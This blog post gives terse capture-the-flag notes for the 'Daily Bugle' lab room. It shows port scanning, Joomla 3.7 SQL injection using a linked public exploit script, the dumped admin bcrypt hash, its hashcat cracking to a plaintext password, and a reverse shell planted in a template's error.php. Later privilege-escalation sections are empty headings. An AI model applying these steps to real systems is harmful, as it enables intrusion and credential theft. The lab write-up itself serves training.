CTF Daily Bugle

CTF CMS
Created At :
Count:207 Views 👀 :
  1. rustscan
  2. robots.txt
  3. jumla
  4. sqli
  5. Crack the hash
  6. revershell
  7. lse
  8. polkit

rustscan

rustscan -a 10.10.56.151 --ulimit 5000

robots.txt

http://10.10.56.151/robots.txt

User-agent: *
Disallow: /administrator/
Disallow: /bin/
Disallow: /cache/
Disallow: /cli/
Disallow: /components/
Disallow: /includes/
Disallow: /installation/
Disallow: /language/
Disallow: /layouts/
Disallow: /libraries/
Disallow: /logs/
Disallow: /modules/
Disallow: /plugins/
Disallow: /tmp/

jumla

http://10.10.56.151//htaccess.txt

we are in 2023, there is few CVE here.

https://blog.sucuri.net/2017/05/sql-injection-vulnerability-joomla-3-7.html

http://10.10.56.151/index.php?option=com_fields&view=fields&layout=modal

sqli

https://raw.githubusercontent.com/stefanlucas/Exploit-Joomla/master/joomblah.py

Found user ['811', 'Super User', 'jonah', 'jonah@tryhackme.com', '$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm', '', '']

Crack the hash

hashcat -m 3200 hash /usr/share/wordlists/seclists/Passwords/Leaked-Databases/rockyou.txt

Output:

$2y$10$0veO/JSFh4389Lluc4Xya.dfy2MF.bZhz0jVMw.V.d3p12kBtZutm:spiderman123

jonah:spiderman123

revershell

https://www.hackingarticles.in/joomla-reverse-shell/
in error.php
then
10.10.56.151/index.php/zefzef

lse

polkit

©2021 Peanutstick's Blog

Built with Hexo and 3-hexo theme